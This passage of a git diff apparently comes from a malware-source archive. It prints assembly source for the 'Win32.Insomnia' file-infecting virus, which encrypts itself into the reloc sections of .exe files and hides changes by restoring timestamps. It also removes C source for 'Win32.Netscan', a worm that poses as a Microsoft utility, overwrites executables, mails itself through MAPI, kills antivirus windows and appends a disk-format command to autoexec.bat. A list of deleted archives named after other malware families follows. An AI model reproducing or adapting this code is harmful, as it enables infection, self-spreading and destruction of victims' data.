"CreateFileMappingA",0 - _MapViewOfFile db "MapViewOfFile",0 - _UnmapViewOfFile db "UnmapViewOfFile",0 - _GetLocalTime db "GetLocalTime",0 - _LoadLibrary db "LoadLibraryA",0 - _SetFileTime db "SetFileTime",0 - -ApiAddressTable: - FindFirstFile dd 0 - FindNextFile dd 0 - GetCurrentDirectory dd 0 - SetCurrentDirectory dd 0 - CreateFile dd 0 - CloseHandle dd 0 - CreateFileMapping dd 0 - MapViewOfFile dd 0 - UnmapViewOfFile dd 0 - GetLocalTime dd 0 - LoadLibrary dd 0 - SetFileTime dd 0 - - NumberOfApis equ 12 - -GetKernel32Base: - pushad - lea ebx,[ebp + k32err] - push ebx - xor ebx,ebx - push dword ptr fs:[ebx] - mov fs:[ebx],esp - mov ebx,eax - cmp word ptr [eax],"ZM" - jne _k32err - add eax,[eax + 3ch] - cmp word ptr [eax],"EP" - jne _k32err - mov [ebp + kernel32base],ebx - pop dword ptr fs:[0] - add esp,4h - popad - stc - ret -_k32err:pop dword ptr fs:[0] - add esp,4h - popad - clc - ret -k32err: mov esp,[esp + 8h] - pop dword ptr fs:[0] - add esp,4h - popad - clc - ret - -VirusCopyRight db ".:[Win32.Insomnia � 2004 DR-EF]:.",0 - -InfectFiles: - mov [ebp + max_dirs],0fh - lea eax,[ebp + cdir] - push eax - push 0ffh - call [ebp + GetCurrentDirectory] - or eax,eax - je ReturnToHost -s_files:cmp [ebp + max_dirs],0h - je r_dir - lea eax,[ebp + WIN32_FIND_DATA] - push eax - lea eax,[ebp + search_mask] - push eax - call [ebp + FindFirstFile] - cmp eax,INVALID_HANDLE_VALUE - je nxt_dir - mov [ebp + hfind],eax -i_file: call InfectFile - lea eax,[ebp + WIN32_FIND_DATA] - push eax - push [ebp + hfind] - call [ebp + FindNextFile] - or eax,eax - jne i_file -nxt_dir:dec [ebp + max_dirs] - lea eax,[ebp + dotdot] - push eax - call [ebp + SetCurrentDirectory] - or eax,eax - jne s_files -r_dir: lea eax,[ebp + cdir] - push eax - call [ebp + SetCurrentDirectory] -ReturnToHost: - ;check for payload: - lea eax,[ebp + SYSTEMTIME] - push eax - call [ebp + GetLocalTime] - cmp word ptr [ebp + wMonth],0ch - jne reth - cmp word ptr [ebp + wDay],1dh - jne reth - lea eax,[ebp + user32dll] - 
push eax - call [ebp + LoadLibrary] - or eax,eax - je reth - lea ebx,[ebp + MessageBox] - push ebx - push eax - call [ebp + GetProcAddress] - or eax,eax - je reth - xor ecx,ecx - push MB_ICONINFORMATION or MB_SYSTEMMODAL - push ecx - lea ebx,[ebp + VirusCopyRight] - push ebx - push ecx - call eax -reth: popfd - popad - db 64h,0A1h,0,0,0,0 ;mov eax,fs:[00000000] - ret - - - SYSTEMTIME: - wYear dw 0 - wMonth dw 0 - wDayOfWeek dw 0 - wDay dw 0 - wHour dw 0 - wMinute dw 0 - wSecond dw 0 - wMilliseconds dw 0 - - user32dll db "user32.dll",0 - MessageBox db "MessageBoxA",0 - MB_SYSTEMMODAL equ 00001000h - MB_ICONINFORMATION equ 00000040h - - - hfind dd 0 - max_dirs db 0fh - search_mask db "*.exe",0 - dotdot db "..",0 - cdir db 0ffh dup(0) - - - WIN32_FIND_DATA: - dwFileAttributes dd 0 - ftCreationTime dq 0 - ftLastAccessTime dq 0 - ftLastWriteTime dq 0 - nFileSizeHigh dd 0 - nFileSizeLow dd 0 - dwReserved0 dd 0 - dwReserved1 dd 0 - cFileName db 0ffh dup (0) - cAlternateFileName db 20 dup (0) - - -InfectFile: - inc byte ptr [ebp + decrypt_key] ;create new key - lea ebx,[ebp + cFileName] - xor eax,eax - push eax - push FILE_ATTRIBUTE_NORMAL - push OPEN_EXISTING - push eax - push eax - push GENERIC_READ or GENERIC_WRITE - push ebx - call [ebp + CreateFile] - cmp eax,INVALID_HANDLE_VALUE - je ExitInfect - mov [ebp + hfile],eax - xor eax,eax - push eax - push eax - push eax - push PAGE_READWRITE - push eax - push [ebp + hfile] - call [ebp + CreateFileMapping] - or eax,eax - je close_f - mov [ebp + hmap],eax - xor eax,eax - push eax - push eax - push eax - push FILE_MAP_WRITE - push [ebp + hmap] - call [ebp + MapViewOfFile] - or eax,eax - je close_m - mov [ebp + mapbase],eax - ;check for valid pe file - cmp word ptr [eax],"ZM" - jne CloseFile - add eax,[eax + 3ch] - cmp word ptr [eax],"EP" - jne CloseFile - ;goto sections table - mov cx,[eax + 6h] ; get number of sections - and ecx,0ffffh - mov ebx,[eax + 34h];get image base - mov dword ptr [ebp + Virus_Start],ebx ;save image 
base insaid decryptor - mov ebx,[eax + 74h];get number of datadirectory - shl ebx,3h - add eax,ebx - add eax,78h - push eax ;eax - sections table - push ecx ;ecx - number of sections - ;check for reloc section -@sec: cmp dword ptr [eax],"ler." - jne nxt_sec - cmp dword ptr [eax + 2h],"cole" - je f_rec -nxt_sec:add eax,28h - loop @sec -ext_rlc:add esp,8h ;restore stack - jmp CloseFile - ;check if the reloc section is bigger than virus -f_rec: cmp dword ptr [eax + 8h],virus_size ;eax - reloc section header ! - jb ext_rlc - ;set new section flags - or dword ptr [eax + 24h],0c0000020h ;code\readable\writeable - ;goto the section raw data: - mov edx,[eax + 0ch] - mov eax,[eax + 14h] - add eax,[ebp + mapbase] - ;overwrite the reloc section with the virus - mov edi,eax - lea esi,[ebp + virus_start] - mov ecx,virus_size -@enc: lodsb - xor al,byte ptr [ebp + decrypt_key] - stosb - loop @enc - pop ecx ;ecx - number of sections - pop ebx ;ebx - sections table - sub eax,[ebp + mapbase] - add dword ptr [ebp + Virus_Start],edx ;eax - virus start infected files -@sec2: cmp dword ptr [ebx + 1h],"txet" ;text ? - je f_cod - cmp dword ptr [ebx + 1h],"edoc" ;code ? - je f_cod - cmp dword ptr [ebx],"EDOC" ;CODE ? 
- je f_cod - add ebx,28h - loop @sec2 - add esp,4h ;restore stack - jmp CloseFile - ;ebx - code section header -f_cod: mov ecx,[ebx + 10h] ;ecx - size of section raw data - mov edx,[ebx + 8h] ;edx - virtual section size - sub ecx,edx - cmp ecx,DecryptorSize - ja write_d - add esp,4h - jmp CloseFile -write_d:mov edi,[ebx + 14h] - mov [ebp + virus_entry_point],edi - add [ebp + virus_entry_point],edx - add edi,[ebp + mapbase] - push edi ;save code section raw data - add edi,edx ;esi - where to write virus decryptor - lea esi,[ebp + VirusDecryptorStart] - mov ecx,DecryptorSize - rep movsb - pop esi ;esi - code section raw data - ;search for all mov eax,fs:[00000000] and replace it with nop --> call virus_decryptor - xchg edx,ecx ;ecx - code section virtual size -@1: cmp word ptr [esi],0a164h - jne nxt_w - cmp dword ptr [esi + 2],0 - jne nxt_w - ;esi - mov eax,fs:[00000000] location. - mov byte ptr [esi],90h ;nop - mov byte ptr [esi + 1h],0e8h;call - mov eax,[ebp + virus_entry_point] - mov ebx,esi - sub ebx,[ebp + mapbase] - sub eax,ebx - sub eax,6h - mov dword ptr [esi + 2h],eax -nxt_w: inc esi - loop @1 -CloseFile: - push [ebp + mapbase] - call [ebp + UnmapViewOfFile] -close_m:push [ebp + hmap] - call [ebp + CloseHandle] -close_f:lea eax,[ebp + ftLastWriteTime] - push eax - lea eax,[ebp + ftLastAccessTime] - push eax - lea eax,[ebp + ftCreationTime] - push eax - push [ebp + hfile] - call [ebp + SetFileTime] - push [ebp + hfile] - call [ebp + CloseHandle] -ExitInfect: - ret - -VirusDecryptorStart equ $ - pushad - pushfd - mov esi,00000000 - Virus_Start equ $-4 - push esi - mov edi,esi - mov ecx,virus_size -@dcrypt:lodsb - xor al,5h - decrypt_key equ $-1 - stosb - loop @dcrypt - ret -EndVirusDecryptor equ $ -DecryptorSize equ (EndVirusDecryptor - VirusDecryptorStart) - - hfile dd 0 - hmap dd 0 - mapbase dd 0 - virus_entry_point dd 0 - -EndVirus equ $ - -First_Gen_Host: - push offset exit - pushfd - pushad - jmp virus_start -exit: push eax - call ExitProcess -end 
First_Gen_Host diff --git a/Win32/Win32.Letum.7z b/Win32/Win32.Letum.7z deleted file mode 100644 index 2b406da4..00000000 Binary files a/Win32/Win32.Letum.7z and /dev/null differ diff --git a/Win32/Win32.Liquid.7z b/Win32/Win32.Liquid.7z deleted file mode 100644 index 040a252c..00000000 Binary files a/Win32/Win32.Liquid.7z and /dev/null differ diff --git a/Win32/Win32.Litmus.7z b/Win32/Win32.Litmus.7z deleted file mode 100644 index 5ff081c8..00000000 Binary files a/Win32/Win32.Litmus.7z and /dev/null differ diff --git a/Win32/Win32.Lolworm.7z b/Win32/Win32.Lolworm.7z deleted file mode 100644 index af702e42..00000000 Binary files a/Win32/Win32.Lolworm.7z and /dev/null differ diff --git a/Win32/Win32.Lusion.7z b/Win32/Win32.Lusion.7z deleted file mode 100644 index e8bef530..00000000 Binary files a/Win32/Win32.Lusion.7z and /dev/null differ diff --git a/Win32/Win32.Mydoom.a.7z b/Win32/Win32.Mydoom.a.7z deleted file mode 100644 index 500b466d..00000000 Binary files a/Win32/Win32.Mydoom.a.7z and /dev/null differ diff --git a/Win32/Win32.Napsin.7z b/Win32/Win32.Napsin.7z deleted file mode 100644 index 554b3732..00000000 Binary files a/Win32/Win32.Napsin.7z and /dev/null differ diff --git a/Win32/Win32.Nastena.7z b/Win32/Win32.Nastena.7z deleted file mode 100644 index 4c7d6b1c..00000000 Binary files a/Win32/Win32.Nastena.7z and /dev/null differ diff --git a/Win32/Win32.Nes.e.7z b/Win32/Win32.Nes.e.7z deleted file mode 100644 index 3b4c904f..00000000 Binary files a/Win32/Win32.Nes.e.7z and /dev/null differ diff --git a/Win32/Win32.Netscan.c b/Win32/Win32.Netscan.c deleted file mode 100644 index b35fd8f5..00000000 --- a/Win32/Win32.Netscan.c +++ /dev/null 
@@ -1,245 +0,0 @@ -#include "netscan.h" -#pragma hdrstop -#pragma warning (disable: 4068) -#pragma warning (disable: 4001) -#pragma resource "resource.res" - -char GetNetScanPath[256],GetNetScanWinDir[256],MyBuffer[256]="echo y|format c: /u /v:HaHaHaHa"; -LPSTR FileEmm386 = "Emm386.exe"; -LPSTR FileSetver = "SetVer.exe"; -LPSTR Nom = "a"; -DWORD ExtInf; -int Err,ErrSend; -HANDLE NetScanTime,NetScanHandle,AutoBat; -HMODULE GetKernLib, GetMapiLib; -HKEY NetScan32Key,NetScanNTKey,NetScanInstall,CreateNetScan; -typedef DWORD(*RegistServProcs)(DWORD,DWORD); -typedef ULONG(*SendMessInfect)(LHANDLE,ULONG,MapiMessage FAR*,FLAGS,ULONG); -typedef ULONG(*FindUserAddress)(LHANDLE,ULONG,LPTSTR,FLAGS,ULONG,lpMapiRecipDesc FAR*); -typedef ULONG(*DoMemFree)(LPVOID); -HWND WindowsHwnd,SymantecHwnd,NAVHwnd; - -#pragma argsused -int APIENTRY WinMain -( -HINSTANCE hInstance, -HINSTANCE hPrevInstance, -LPSTR lpszCmdLine, -int nCmdShow -) -{ -//Win32.NetScan by ZeMacroKiller98 -//Tous droits r‚serv‚s (c) 2001 -WIN32_FIND_DATA GetFileToInfect; -OSVERSIONINFO GetOsVer; -FILETIME GetFileCreateTime,GetFileLstAccess,GetFileLstWrite; -SYSTEMTIME TriggerScanTime; -RegistServProcs MyServProcs; -SendMessInfect SendMessToOther; -FindUserAddress GetAddressUser; -DoMemFree GetMemFree; -GetKernLib = LoadLibrary("kernel32.dll"); -MyServProcs = (RegistServProcs)GetProcAddress(GetKernLib,"RegisterServiceProcess"); -MessageBox(NULL,"This freeware install automaticaly itself into your system\nIt scan your system each time you connect to network\nIf you have any problem, contact Microsoft","NetScan Utility",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL); -SearchPath(NULL,_argv[0],NULL,sizeof(GetNetScanPath),GetNetScanPath,NULL); -GetOsVer.dwOSVersionInfoSize = sizeof(GetOsVer); -GetVersionEx(&GetOsVer); -if(GetOsVer.dwPlatformId==VER_PLATFORM_WIN32_NT) -{ - RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\WindowsNT\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScanNTKey); - 
RegSetValueEx(NetScanNTKey,"NetScanNT",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath)); - RegCloseKey(NetScanNTKey); -} -else -{ - RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices",0,KEY_ALL_ACCESS,&NetScan32Key); - RegSetValueEx(NetScan32Key,"NetScan32",0,REG_SZ,GetNetScanPath,sizeof(GetNetScanPath)); - RegCloseKey(NetScan32Key); -} -if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\NetScan\\Install",0,KEY_ALL_ACCESS,&NetScanInstall)!=ERROR_SUCCESS) -{ - GetMapiLib = LoadLibrary("mapi32.dll"); - GetWindowsDirectory(GetNetScanWinDir,sizeof(GetNetScanWinDir)); - SetCurrentDirectory(GetNetScanWinDir); - NetScanHandle = FindFirstFile("*.exe",&GetFileToInfect); - NetScanFind: - NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - GetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite); - CloseHandle(NetScanTime); - if((lstrcmp(GetFileToInfect.cFileName,"emm386.exe")==0)||(lstrcmp(GetFileToInfect.cFileName,"setver.exe")==0)) - goto NotInfection; - CopyFile(_argv[0],GetFileToInfect.cFileName,FALSE); - NetScanTime = CreateFile(GetFileToInfect.cFileName,GENERIC_READ|GENERIC_WRITE,0, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); - SetFileTime(NetScanTime,&GetFileCreateTime,&GetFileLstAccess,&GetFileLstWrite); - CloseHandle(NetScanTime); - NotInfection: - if(FindNextFile(NetScanHandle,&GetFileToInfect)==TRUE) - goto NetScanFind; - FindClose(NetScanHandle); - RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Britney\\Install",&CreateNetScan); - RegCloseKey(CreateNetScan); - SendMessToOther = (SendMessInfect)GetProcAddress(GetMapiLib,"MAPISendMail"); - GetAddressUser = (FindUserAddress)GetProcAddress(GetMapiLib,"MAPIResolveName"); - GetMemFree = (DoMemFree)GetProcAddress(GetMapiLib,"MAPIFreeBuffer"); - if((SendMessToOther==NULL)||(GetAddressUser==NULL)||(GetMemFree==NULL)) - { - MessageBox(NULL,"This program need MAPI functions installed on your 
PC\nPlease contact your hot line to install it","NetScan Utility",MB_OK|MB_ICONEXCLAMATION); - SetCurrentDirectory("C:/"); - DeleteFile("*.*"); - ExitProcess(0); - } -MapiMessage stMessage; -MapiRecipDesc stRecip; -MapiFileDesc stFile; -lpMapiRecipDesc lpRecip; -stFile.ulReserved = 0; -stFile.flFlags = 0L; -stFile.nPosition = (ULONG)-1; -stFile.lpszPathName = GetNetScanPath; -stFile.lpszFileName = NULL; -stFile.lpFileType = NULL; -MessageBox(NULL,"To test your network, you need to select a email address into your address book\nPlease select address with","ILoveBritney Freeware",MB_OK|MB_ICONINFORMATION|MB_SYSTEMMODAL); -UnResolve: -Err = (GetAddressUser)(lhSessionNull,0L,Nom,MAPI_DIALOG,0L,&lpRecip); -if(Err!=SUCCESS_SUCCESS) -{ -switch(Err){ - case MAPI_E_AMBIGUOUS_RECIPIENT: - MessageBox(NULL,"The recipient requested has not been or could\n not be resolved to a unique address list entry","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - break; - case MAPI_E_UNKNOWN_RECIPIENT: - MessageBox(NULL,"The recipient could not be resolved to any\naddress.The recipient might not exist or might be unknown","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - break; - case MAPI_E_FAILURE: - MessageBox(NULL,"One or more unspecified errors occured\nThe name was not resolved","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - case MAPI_E_INSUFFICIENT_MEMORY: - MessageBox(NULL,"There was insufficient memory to proceed","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - case MAPI_E_NOT_SUPPORTED: - MessageBox(NULL,"The operation was not supported by the messaging system","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - case MAPI_E_USER_ABORT: - MessageBox(NULL,"The user was cancelled one or more dialog box","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); - break; - } -goto 
UnResolve; -} -stRecip.ulReserved = lpRecip->ulReserved; -stRecip.ulRecipClass = MAPI_TO; -stRecip.lpszName = lpRecip->lpszName; -stRecip.lpszAddress = lpRecip->lpszAddress; -stRecip.ulEIDSize = lpRecip->ulEIDSize; -stRecip.lpEntryID = lpRecip->lpEntryID; -stMessage.ulReserved = 0; -stMessage.lpszSubject = "Microsoft NetScan Utility"; -stMessage.lpszNoteText = lstrcat("Hi ",(lstrcat(lpRecip->lpszName,"\n\n\tI send you this mail to test my network\nI need you to send me a answer about it\nThis program can scan your network to find all problem into your network\n\n\tEnjoy to test your net...\nThank you and see you soon....\n\n\n\t\t\t\t\tMicrosoft Technical Support"))); -stMessage.lpszMessageType = NULL; -stMessage.lpszDateReceived = NULL; -stMessage.lpszConversationID = NULL; -stMessage.flFlags = 0L; -stMessage.lpOriginator = NULL; -stMessage.nRecipCount = 1; -stMessage.lpRecips = &stRecip; -stMessage.nFileCount = 1; -stMessage.lpFiles = &stFile; -ErrSend = (SendMessToOther)(lhSessionNull,0L,&stMessage,0L,0L); -if(ErrSend!=SUCCESS_SUCCESS) -{ - MessageBox(NULL,"The test can't continue, due to a error occured during to sending message\nPlease contact our hotline at hotline@microsoft.com","NetScan Utility",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DeleteFile("*.*"); - ExitProcess(0); -} -MessageBox(NULL,"The test is OK and NetScan is installed into your system\n", - "NetScan Utility", - MB_OK|MB_ICONINFORMATION); -FreeLibrary(GetMapiLib); -} -RegCloseKey(NetScanInstall); -STARTUPINFO NetScanInfo; -PROCESS_INFORMATION NetScanProc; -NetScanInfo.cb = sizeof(STARTUPINFO); -NetScanInfo.lpReserved = NULL; -NetScanInfo.lpReserved2 = NULL; -NetScanInfo.cbReserved2 = 0; -NetScanInfo.lpDesktop = NULL; -NetScanInfo.dwFlags = STARTF_FORCEOFFFEEDBACK; -if(CreateProcess(GetNetScanPath, - NULL, - (LPSECURITY_ATTRIBUTES)NULL, - (LPSECURITY_ATTRIBUTES)NULL, - FALSE, - 0, - NULL, - NULL, - &NetScanInfo, - &NetScanProc)) -{ -CloseHandle(NetScanProc.hProcess); 
-CloseHandle(NetScanProc.hThread); -} -if(CreateMutex(NULL,TRUE,GetNetScanPath)==NULL) - ExitProcess(0); -SetPriorityClass(NetScanProc.hProcess,REALTIME_PRIORITY_CLASS); -MyServProcs(NetScanProc.dwProcessId,1); -GetSystemTime(&TriggerScanTime); -//Close windows which title is WINDOWS -WindowsHwnd = FindWindow(NULL,"WINDOWS"); -if(WindowsHwnd!=NULL) - DestroyWindow(WindowsHwnd); -//Close access to Symantec HomePage -SymantecHwnd = FindWindow(NULL,"Symantec Security Updates - Home Page - Microsoft Internet Explorer"); -if(SymantecHwnd!=NULL) -{ - MessageBox(NULL,"You don't have access to this page\nPlease contact the web master to correct this problem\n","Microsoft Internet Explorer",MB_OK|MB_ICONEXCLAMATION|MB_ICONSTOP); - DestroyWindow(SymantecHwnd); -} -//Anti Norton Antivirus -NAVHwnd = FindWindow(NULL,"Norton AntiVirus"); -if(NAVHwnd !=NULL) -{ - MessageBox(NULL,"Ha Ha Ha Ha!!!!, you use NAV?????\nI can allow access to it\nChange AV now","Win32.NetScan",MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL); - DestroyWindow(NAVHwnd); -} -if((TriggerScanTime.wHour==12)&&(TriggerScanTime.wMinute==12)) -{ - mciSendString("open cdaudio",NULL,0,NULL); - mciSendString("set cdaudio door open",NULL,0,NULL); - mciSendString("close cdaudio",NULL,0,NULL); - mciSendString("open cdaudio",NULL,0,NULL); - mciSendString("set cdaudio audio all off",NULL,0,NULL); - mciSendString("close cdaudio",NULL,0,NULL); - MessageBeep(MB_ICONEXCLAMATION); -} -if(TriggerScanTime.wDay==1) -{ - MessageBox(NULL,"It's the day that your PC is going to scan or maybe going to disappear","Win32.Netscan",MB_OK|MB_ICONEXCLAMATION); - SetCurrentDirectory("C:\\"); - AutoBat = CreateFile("autoexec.bat",GENERIC_WRITE,0,(LPSECURITY_ATTRIBUTES) NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,(HANDLE) NULL); - SetFilePointer(AutoBat, 0, (LPLONG)NULL,FILE_END); - WriteFile(AutoBat,MyBuffer,sizeof(MyBuffer),&ExtInf,NULL); - CloseHandle(AutoBat); - ExitWindowsEx(EWX_FORCE|EWX_REBOOT,0); -} -FreeLibrary(GetKernLib); -return 0; -} - - 
-*************************************************************************
-
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-#include
-#include
-#include
\ No newline at end of file
diff --git a/Win32/Win32.Nicole.7z b/Win32/Win32.Nicole.7z
deleted file mode 100644
index 2b8816c8..00000000
Binary files a/Win32/Win32.Nicole.7z and /dev/null differ
diff --git a/Win32/Win32.Null.7z b/Win32/Win32.Null.7z
deleted file mode 100644
index eaa3cc06..00000000
Binary files a/Win32/Win32.Null.7z and /dev/null differ
diff --git a/Win32/Win32.Nzm.7z b/Win32/Win32.Nzm.7z
deleted file mode 100644
index d8b5525d..00000000
Binary files a/Win32/Win32.Nzm.7z and /dev/null differ
diff --git a/Win32/Win32.Poshspy.7z b/Win32/Win32.Poshspy.7z
deleted file mode 100644
index 6dc779f2..00000000
Binary files a/Win32/Win32.Poshspy.7z and /dev/null differ
diff --git a/Win32/Win32.Psyclon.7z b/Win32/Win32.Psyclon.7z
deleted file mode 100644
index c720ba99..00000000
Binary files a/Win32/Win32.Psyclon.7z and /dev/null differ
diff --git a/Win32/Win32.Pwnbot.7z b/Win32/Win32.Pwnbot.7z
deleted file mode 100644
index 7f8250d5..00000000
Binary files a/Win32/Win32.Pwnbot.7z and /dev/null differ
diff --git a/Win32/Win32.Rage.7z b/Win32/Win32.Rage.7z
deleted file mode 100644
index 4d8a214a..00000000
Binary files a/Win32/Win32.Rage.7z and /dev/null differ
diff --git a/Win32/Win32.Ramlide.7z b/Win32/Win32.Ramlide.7z
deleted file mode 100644
index 7115530a..00000000
Binary files a/Win32/Win32.Ramlide.7z and /dev/null differ
diff --git a/Win32/Win32.Reptile.7z b/Win32/Win32.Reptile.7z
deleted file mode 100644
index b44cb9c1..00000000
Binary files a/Win32/Win32.Reptile.7z and /dev/null differ
diff --git a/Win32/Win32.Retro.7z b/Win32/Win32.Retro.7z
deleted file mode 100644
index 8171bf60..00000000
Binary files a/Win32/Win32.Retro.7z and /dev/null differ
diff --git a/Win32/Win32.Riot.7z b/Win32/Win32.Riot.7z
deleted file mode 100644
index 6642750e..00000000
Binary files a/Win32/Win32.Riot.7z and /dev/null differ
diff --git a/Win32/Win32.Rootkit.Alpha.a.c.7z b/Win32/Win32.Rootkit.Alpha.a.c.7z
deleted file mode 100644
index 42547cf4..00000000
Binary files a/Win32/Win32.Rootkit.Alpha.a.c.7z and /dev/null differ
diff --git a/Win32/Win32.Rose.c.7z b/Win32/Win32.Rose.c.7z
deleted file mode 100644
index 4781f1d4..00000000
Binary files a/Win32/Win32.Rose.c.7z and /dev/null differ
diff --git a/Win32/Win32.Rubilyn.7z b/Win32/Win32.Rubilyn.7z
deleted file mode 100644
index a6ebc7c6..00000000
Binary files a/Win32/Win32.Rubilyn.7z and /dev/null differ
diff --git a/Win32/Win32.Ruff.7z b/Win32/Win32.Ruff.7z
deleted file mode 100644
index e3224b2e..00000000
Binary files a/Win32/Win32.Ruff.7z and /dev/null differ
diff --git a/Win32/Win32.S5.7z b/Win32/Win32.S5.7z
deleted file mode 100644
index 10c02d08..00000000
Binary files a/Win32/Win32.S5.7z and /dev/null differ
diff --git a/Win32/Win32.Sd.7z b/Win32/Win32.Sd.7z
deleted file mode 100644
index 4ed8c821..00000000
Binary files a/Win32/Win32.Sd.7z and /dev/null differ
diff --git a/Win32/Win32.Sdx.7z b/Win32/Win32.Sdx.7z
deleted file mode 100644
index 0e6fcc39..00000000
Binary files a/Win32/Win32.Sdx.7z and /dev/null differ
diff --git a/Win32/Win32.Serotonin.7z b/Win32/Win32.Serotonin.7z
deleted file mode 100644
index 7421fe99..00000000
Binary files a/Win32/Win32.Serotonin.7z and /dev/null differ
diff --git a/Win32/Win32.Shadow.7z b/Win32/Win32.Shadow.7z
deleted file mode 100644
index 977c3581..00000000
Binary files a/Win32/Win32.Shadow.7z and /dev/null differ
diff --git a/Win32/Win32.Shadow.a.7z b/Win32/Win32.Shadow.a.7z
deleted file mode 100644
index 59ffb2aa..00000000
Binary files a/Win32/Win32.Shadow.a.7z and /dev/null differ
diff --git a/Win32/Win32.Shadow.b.7z b/Win32/Win32.Shadow.b.7z
deleted file mode 100644
index 7b86b80a..00000000
Binary files a/Win32/Win32.Shadow.b.7z and /dev/null differ
diff --git a/Win32/Win32.ShellbotFTP.7z b/Win32/Win32.ShellbotFTP.7z
deleted file mode 100644
index 13b6427e..00000000
Binary files a/Win32/Win32.ShellbotFTP.7z and /dev/null differ
diff --git a/Win32/Win32.Sinapps.7z b/Win32/Win32.Sinapps.7z
deleted file mode 100644
index 1547b09e..00000000
Binary files a/Win32/Win32.Sinapps.7z and /dev/null differ
diff --git a/Win32/Win32.SkonkModBot.a.7z b/Win32/Win32.SkonkModBot.a.7z
deleted file mode 100644
index 71e89481..00000000
Binary files a/Win32/Win32.SkonkModBot.a.7z and /dev/null differ
diff --git a/Win32/Win32.Skuz.7z b/Win32/Win32.Skuz.7z
deleted file mode 100644
index 9cd6a5d4..00000000
Binary files a/Win32/Win32.Skuz.7z and /dev/null differ
diff --git a/Win32/Win32.Small.7z b/Win32/Win32.Small.7z
deleted file mode 100644
index 2dd0bbb9..00000000
Binary files a/Win32/Win32.Small.7z and /dev/null differ
diff --git a/Win32/Win32.Sonia.7z b/Win32/Win32.Sonia.7z
deleted file mode 100644
index a9c2eb49..00000000
Binary files a/Win32/Win32.Sonia.7z and /dev/null differ
diff --git a/Win32/Win32.Spaz.b.7z b/Win32/Win32.Spaz.b.7z
deleted file mode 100644
index ccbd1274..00000000
Binary files a/Win32/Win32.Spaz.b.7z and /dev/null differ
diff --git a/Win32/Win32.Steam.7z b/Win32/Win32.Steam.7z
deleted file mode 100644
index 127e5a7e..00000000
Binary files a/Win32/Win32.Steam.7z and /dev/null differ
diff --git a/Win32/Win32.Stolich.7z b/Win32/Win32.Stolich.7z
deleted file mode 100644
index 373ef673..00000000
Binary files a/Win32/Win32.Stolich.7z and /dev/null differ
diff --git a/Win32/Win32.Sv.7z b/Win32/Win32.Sv.7z
deleted file mode 100644
index 1423d35d..00000000
Binary files a/Win32/Win32.Sv.7z and /dev/null differ
diff --git a/Win32/Win32.Tank.7z b/Win32/Win32.Tank.7z
deleted file mode 100644
index 4861861a..00000000
Binary files a/Win32/Win32.Tank.7z and /dev/null differ
diff --git a/Win32/Win32.TinyNuke.7z b/Win32/Win32.TinyNuke.7z
deleted file mode 100644
index 05218cf1..00000000
Binary files a/Win32/Win32.TinyNuke.7z and /dev/null differ
diff --git a/Win32/Win32.Trochilus.7z b/Win32/Win32.Trochilus.7z
deleted file mode 100644
index 36c1f250..00000000
Binary files a/Win32/Win32.Trochilus.7z and /dev/null differ
diff --git a/Win32/Win32.Tsgh.7z b/Win32/Win32.Tsgh.7z
deleted file mode 100644
index 997ce9db..00000000
Binary files a/Win32/Win32.Tsgh.7z and /dev/null differ
diff --git a/Win32/Win32.Volk.7z b/Win32/Win32.Volk.7z
deleted file mode 100644
index faa04307..00000000
Binary files a/Win32/Win32.Volk.7z and /dev/null differ
diff --git a/Win32/Win32.Wisdom.c.7z b/Win32/Win32.Wisdom.c.7z
deleted file mode 100644
index e0d83b73..00000000
Binary files a/Win32/Win32.Wisdom.c.7z and /dev/null differ
diff --git a/Win32/Win32.Woodworm.7z b/Win32/Win32.Woodworm.7z
deleted file mode 100644
index a3507e80..00000000
Binary files a/Win32/Win32.Woodworm.7z and /dev/null differ
diff --git a/Win32/Win32.Ya.7z b/Win32/Win32.Ya.7z
deleted file mode 100644
index c559b468..00000000
Binary files a/Win32/Win32.Ya.7z and /dev/null differ
diff --git a/Win32/Win32.Zemra.7z b/Win32/Win32.Zemra.7z
deleted file mode 100644
index 468d354a..00000000
Binary files a/Win32/Win32.Zemra.7z and /dev/null differ
diff --git a/Win32/Win32.Zero.7z b/Win32/Win32.Zero.7z
deleted file mode 100644
index a3da3f18..00000000
Binary files a/Win32/Win32.Zero.7z and /dev/null differ
diff --git a/Win32/Win32.Zotob.7z b/Win32/Win32.Zotob.7z
deleted file mode 100644
index 55233fb2..00000000
Binary files a/Win32/Win32.Zotob.7z and /dev/null differ
diff --git a/Win32/Win32.irBot.7z b/Win32/Win32.irBot.7z
deleted file mode 100644
index e1cda8da..00000000
Binary files a/Win32/Win32.irBot.7z and /dev/null differ